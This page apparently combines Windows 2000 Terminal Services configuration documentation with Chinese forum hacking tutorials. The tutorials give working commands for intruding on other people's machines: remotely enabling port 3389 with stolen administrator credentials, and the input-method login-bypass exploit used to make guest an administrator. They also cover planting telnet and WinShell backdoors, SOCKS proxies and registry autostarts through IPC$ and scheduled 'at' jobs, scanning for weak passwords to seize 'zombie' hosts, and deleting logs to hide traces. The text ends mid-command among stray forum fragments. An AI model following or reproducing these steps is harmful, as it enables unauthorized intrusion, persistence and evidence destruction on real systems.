打开终端服务配置时,您将会看到已经配置的连接。这称为 RDP-TCP 连接。通常,这只是需要为使用终端服务器的客户配置的连接。对于终端服务器,只能为每个网卡配置一个 RDP(远程桌面协议)连接。如果要配置其他的 RDP 连接,您必须安装附加的网卡。
使用终端服务配置,您可以重新配置 RDP-TCP 连接的属性,包括限制客户机会话在服务器上保持活动状态的时间、设置加密的保护级别以及选择您希望用户和组具备的权限。某些连接属性也可以使用&本地用户和组&的终端服务扩展程序在每用户基础上配置。例如,当您使用&本地用户和组&的终端服务扩展程序时,可以为每个用户设置不同会话期限。使用终端服务配置,您可以只在每连接基础上设置会话期限,这意味着相同期限将应用于使用连接登录到服务器的所有用户。
除配置连接以外,您可以使用&终端服务配置&功能配置可应用于终端服务器的设置。包括临时文件夹的设置、默认连接安全性以及启用/禁用 Internet 连接器许可。详细信息,请参阅配置服务器设置。
基于 Citrix CA 的客户机
终端服务配置还用于为基于 Citrix CA 的客户机配置连接。当 Citrix CA 协议和基于 Citrix CA 的客户软件添加到该系统时,可以使用 TCP/IP、同步、IPX/SPX 或 NetBIOS 传输协议配置这些连接
有很多朋友问怎么开启3389终端服务下面我们一起来探索一下远程开启3389的方法. 首先我们应该了解3389终端服务,可以运行在什么系统下,个人了解,终端服务在M$的大部分
产品中都可运行,如:winnt4/win2000server/win2000ADV-server/win2000DS/XP等.
但winnt4中是需要单独购买的,2000专业版不能远程安装终端服务的,至少我没成功过.
我们在以下的探索中,是以win2000server和高级server为例的.(现在用的也最多).
现在开始. 假设我们拿到了一个主机的管理员帐户和密码.
主机: 192.168.0.1
帐号: administrator
密码: 7788
2000系统安装在c:winnt下
从上面的的介绍可以知道,2000专业版是不可以远程安装终端服务的,那我们就要首先来
判断此主机是专业版还是服务器版,才能进入下一个环节. 我们可以先用对方所开帐户判断: c:&letmein
stating connecting to server ...
Server local time is:
Start get all users FORM server...
--------------------------
--------------------------
num0= Administrator ()
num1= Guest ()
num2= IUSR_servername (Internet 来宾帐号 )
num3= IWAM_servername (启动 IIS 进程帐号)
num4= TsInternetUser (TsInternetUser)
--------------------------
-------------------------- 一般情况num2/3/4这三个帐户都是2000server默认开启的.
2000专业版默认是不开这些帐户的. 我们也可以扫描对方开放的端口进一步确认:
用扫描软件如:superscan3.exe扫描对方所开端口
判断对方是否开启25,server默认开启的端口. 当然我们还可以使用一些工具,如:cmdinfo.zip
这2个东东可以获得本地或远程NT/2K主机的版本,系统路径,源盘路径,PACK版本,安装时间等一
系列信息,一个图形界面,一个命令行.
通过返回的信息就可以很清楚的了解对方主机情况. 还有一些其他的方法来判断,如:从对方所开的服务来确定等,
从上面的判断准确率还算高,别的就不一一说明了.
如果你在以上步骤里发现对方主机并没有那3个帐户,默认端口也没开,
或cmdinfo返回的信息对方是2000专业版,你就要放弃安装3389的计划了.
现在我们要进入下一环节:
判断终端服务到底有没有安装? 你也许要问:为什么还要判断啊?我扫描没有发现3389端口啊
这里就需要解释一下,如果装了终端服务组件,可能有哪几种情况扫描不到3389端口?
1.终端服务termservice在&管理工具&&&&&服务&中被禁用.
2.终端服务连接所需的RDP协议在&管理工具&&&&&终端服务配置&中被停用连接.
3.终端服务默认连接端口3389被人为的改变.如何改变请看修改终端服务默认的3389端口
4.终端服务绑定的网络适配器不是外网的.
5.防火墙和端口过滤之类的问题.
6.....(还有我没想到的)
其实,我们遇到最多的情况就是以上5种情况. 现在开始判组件是否被安装. 先与远程主机连接,映射远程主机C盘为本地Z盘
net use z:
&7788& /user:&administrator&
命令成功完成。 然后转到Z盘,检查
Z:Documents and SettingsAll Users「开始」菜单程序管理工具&
里是否有 &终端服务管理器&和&终端服务配置&的快捷方式文件
如有已安装服务组件的会有,反之,没有(98% 人为故意删的可能性较小)
我们还可以在下一步telnet到对方主机后使用终端服务自带的命令进一步的核实. 判断完毕,对方好像是没有安装终端服务组件,可以进入下一步:
telnet登陆对方主机,准备安装服务组件. 在这里,我强烈建议使用2000自带的telnet服务端登陆,
有回显,不容易出错.个人感觉使用它,一次成功的比例高很多.(呵呵~,个人理解啊!)
就算没有开,打开用完后再关掉就完了.
.abu.写的最快速登录WIN2K TELNET 服务已经把这个方法介绍的非常详细,
而且他的办法(在本机建立同名,同密码帐户),让快速实现telnet登陆成为现实. 假如我们已开启对方23端口,
telnet 192.168.0.1
输入用户名/密码
*===============================================================
欢迎使用 Microsoft Telnet 服务器。
*===============================================================
成功进入!!!! 进入后,再次检查终端组件是否安装:
c:&query user
这个工具需要安装终端服务. 这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
&w1 console 0 运行中 .
类似这样的信息,可能组件就已安装. 好!都清楚了,可以开始安装了.
---------------------------------------------------
C:&dir c:sysoc.inf /s //检查INF文件的位置
c:WINNTinf 的目录
20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:& dir c:sysocmgr.* /s //检查组件安装程序
c:WINNTsystem32 的目录
20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:&echo [Components] & c:wawa
c:&echo TSEnable = on && c:wawa
//这是建立无人参与的安装参数
c:&type c:wawa
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:&sysocmgr /i:c:winntinfsysoc.inf /u:c:wawa /q
-----------------------------------------------------
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起. 如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了. 问题和建议: A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方
的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒. B 一次不行可以再试一次,在实际中很有作用. C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼,
而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错,所以会有B的建议.
好了以后你就想干什么就干什么了。不过有时候还真不知道干什么,总之得干个事,装个什么局域网控制软件,不过不要体积太大,容易被发现。
超强 C 语言代码,你有信心看懂吗?
刚刚说有输入法漏洞的机子很少了,但有些朋友担心还有怎么办,不是吃大亏了吗?这样我找了一篇写的不错的文章贴一下( 注意是转载)写的不错,据说是新写的,这位大哥也真闲啊
WIN2000中文简体版存在的输入法漏洞,可以使本地用户绕过身分验证机制进入系统内部。经实验,WIN2000中文简体版的终端服务,在远程操作时仍然存在这一漏洞,而且危害更大。
WIN2000的终端服务功能,能使系统管理员对WIN2000进行远程操作,采用的是图形界面,能使用户在远程控制计算机时功能与在本地使用一样,其默认端口为3389,用户只要装了WIN2000的客户端连接管理器就能与开启了该服务的计算机相联。因此这一漏洞使终端服务成为WIN2000的合法木马。
工具:客户端连接管理器,下载地址:自己找吧,天天有好几种呢。
入侵步骤:
一,获得管理员账号。
我们先对一个网段进行扫描,扫描端口设为3389,运行客户端连接管理器,将扫描到的任一地址加入到,设置好客户端连接管理器,然后与服务器连结。几秒钟后,屏幕上显示出WIN2000登录界面(如果发现是英文或繁体中文版,放弃,另换一个地址),用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,请耐心等待,因为对方的数据流传输还有一个过程)。用右键点击状态条上的微软徽标,弹出&帮助&(如果发现&帮助&呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞),打开&帮助&一栏中&操作指南&,在最上面的任务栏点击右键,会弹出一个菜单,打开&跳至URL&。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如,该系统安装在C盘上,就在空白栏中填入&c:winntsystem32&。然后按&确定&,于是我们就成功地绕过了身份验证,进入了系统的SYSTEM32目录。
现在我们要获得一个账号,成为系统的合法用户。在该目录下找到&net.exe&,为&net.exe&创建一个快捷方式,右键点击该快捷方式,在&属性&-&&目标&-&c:winntsystem32net.exe后面空一格,填入&user guest /active :yes&点&确定&。这一步骤目的在于用net.exe激活被禁止使用的guest账户,当然也可以利用&user 用户名 密码/add&,创建一个新账号,但容易引起网管怀疑。运行该快捷方式,此时你不会看到运行状态,但guest用户已被激活。然后又修改该快捷方式,填入&user guest 密码&,运行,于是guest便有了密码。最后,再次修改,填入&localgroup administrators guest /add,将guest变成系统管理员。
注意事项:1、在这过程中,如果对方管理员正在使用终端服务管理器,他将看到你所打开的进程id,你的ip和机器名,甚至能够给你发送消息。
2、终端服务器在验证你的身份的时候只留给了你一分钟的时间,在这一分钟内如果你不能完成上述操作,你只能再连结。
3、你所看到的图像与操作会有所延迟,这受网速的影响。
二,创建跳板。
再次登录终端用务器,以&guest&身份进入,此时guest已是系统管理员,已具备一切可执行权。打开&控制面板&,进入&网络和拔号连接&,在&本地连接&或&拔号连接&中查看属性,看对方是否选择&Microsoft 网络的文件和打印机共享&,如果没有,就打上勾。对方如果使用的是拔号上网,下次拔号网络共享才会打开。
退出对方系统,在本地机命令提示符下,输入
AddressIPC$ [&password&] /user:&guset&,通过IPC的远程登陆就成功了。
登陆成功之后先复制一个Telnet的程序上去(小榕流光安装目录下的Tools目录里的Srv.exe,另外,还有ntml.xex,一会要用),这个程序是在对方上面开一个Telnet服务,端口是99。
copy c:hacksrv.exe
然后利用定时服务启动它,先了解对方的时间:
net time ***.***.***.***
***.***.***.*** 的当前时间是
下午 08:55
命令成功完成。
然后启动srv.exe:
at ***.***.***.*** 09:00 srv.exe 
新加了一项作业,其作业 ID = 0
过几分钟后,telnet ***.***.***.*** 99
这里不需要验证身份,直接登录,显示:
c:winnt:system32&
我们就成功登陆上去了。然后又在本地打开命令提示符,另开一个窗口,输入:
copy c:hackntlm.exe
把事先存放在hack目录里的ntlm.exe拷过去。然后又回到刚才的telnet窗口,运行ntlm.exe
C:WINNTsystem32&ntlm
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
C:WINNTsystem32&
C:WINNTsystem32&
好,现在我们来启动WIN2000本身的telnet,首先终止srv.exe的telnet服务:
net stop telnet 系统告诉你并没有启动telnet,不理它,继续:
net start telnet 这次真的启动了telnet,我们可以在另开的命令提示符窗口telnet到对方的
23端口,验证身份,输入我们的guest账号和密码,它就真正成为我们的跳板了。我们可以利用它到其它的主机去。
三、扫除脚印:
删除为net.exe 创建的快捷方式,删除winntsystem32logfiles下边的日志文件
[第5天]从简单的网络命令讲起
昨天的帖子发表后,很多朋友问了很多问题,我发现很多朋友对基本的网络命令还很生疏,请你看这个帖子,里面讲的很详细的
有个朋友问了我个问题:端口映射是什么意思??
其实很简单的,采用端口映射(Port Mapping)的方法,可以实现从Internet到局域网内部机器的特定端口服务的访问。例如,你所使用的机子处于一个连接到Internet的局域网内,你在机子上所开的所有服务(如FTP),默认情况下外界是访问不了的。这是因为你机子的IP是局域网内部IP,而外界能访问的只有你所连接的服务器的IP,由于整个局域网在Internet上只有一个真正的IP地址,而这个IP地址是属于局域网中服务器独有的。所以,外部的Internet登录时只可以找到局域网中的服务器,那你提供的服务当然是不起作用的。
所以解决这个问题的方法就是采用PM了。
有篇文章不错。大家看看:
继续讲,昨天有人说我找到个肉鸡,但不会用远程控制软件。先说用什么好呢
我推荐Remote Administrator,有篇介绍它的文章很好:
我想里面的说明你应该能很好理解的
现在我以一个例子来说一下怎么获得一个肉鸡,虽然前面一直在说,但好象有点乱的,下面说的这个有点投机取巧的感觉,至少我这样觉得,不过因为很多朋友说都5天了,我什么都没搞到啊,所以只能。。
第一步:扫描弱口令
这里我用20cn开发的scanipc (这有下的)
不一会就会扫到很多有弱口令的主机
(你可以拿你们学校的IP试试)
这里我用opentelnet(远程启动TELNET的小东西,这里下:)给扫描到开了空口令的主机开个端口让我们telnet连接上去
,开了23端口,并可以连接上的主机就不用进行次步骤了!
Opentelnet使用方法:
OpenTelnet.exe
&帐号& &密码& &NTLM认证方式& &Telnet端口&
C:&OpenTelnet.exe
administrator
90 用户名:administrator 密码:123456
NTLM认证方式:1(也可以选择0请自己测试) 开的端口:90
运行完,如果屏幕上出现 Disconnecting server...Successfully! 就说明已经成功。
这样,我们就能够得到一个开90端口的Telnet服务器了。
Telnet 192.168.1.2 90
这样就可以登录上去了。
第三步:配置并安装后门程序
这里我选择WinShell(小巧精干我喜欢下载:),用winshell主程序设置好后门,然后把后门程序传到台FTP空间上!
然后输入用户名字 密码把后门传上去mput c:cnwill.exe
现在我们登陆到肉鸡上 Telnet 192.168.1.2 90
把刚上传的后门程序下载并运行(别忘记删除 后门程序)
『后门也可以用net命令完成』
90ipc$ && /user:&administrator&
[ 建 立 IPC$ 连 接 ]
copy d:zilong.exe
90admin$system32
[ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里]
copy d:long.exe
90admin$system32
[上 传 一 个 删 除 日 志 程 序 到 对 方 的 主 机 里]
copy d:scoks.exe
90admin$system32
[ 上 传 一 个 SCOKS 代 理 程 序 到 对 方 的 主 机 里]
copy d:zilong.reg
90admin$system32
[上 传 导 入 注 册 表的 REG 文 件 到 对 方 的 主 机 里]请看后门说明
[ 得 到 对 方 主 机 的 当 前 时 间]
90 13:20 zilong.exe
[用 a t命 令 执 行 我 们 的 后 门 程 序] 别 把 时 间 搞 错 了 哦
==============
如果大家用不习惯命令的话,那就用流光的IPC种植者吧,简单易用.这里就不赘述啦
=============
telnet 192.168.1.2 90
[ 从 我 们 设 置 的 后 门 程 序 登 陆 主 机 ]
net user **** /add
[近来后添加一个用户名再说或者也可以选择激活guest]
net localgroup administrators **** /add
[ 把 自 己 添 加 到 管 理 组 里,这 样 我 们 就 是 超 级 管 理 员 了]
regedit /s c:winntsystem32zilong.reg
[ 把 后 门 程 序 导 入 注 册 表 的 启 动 项]这样做是防止被别人停止我们
的后门服务程序,就算我们的后门服务程序被停止了,在主机重启动后我们的后门
服务就又继续运行了.
SOCKS -install
[ 开 始 安 装 socks 代 理]
SCOKS -config starttype 2
[ 使 SO

我要回帖

更多关于 gwrks64.dll 的文章

 

随机推荐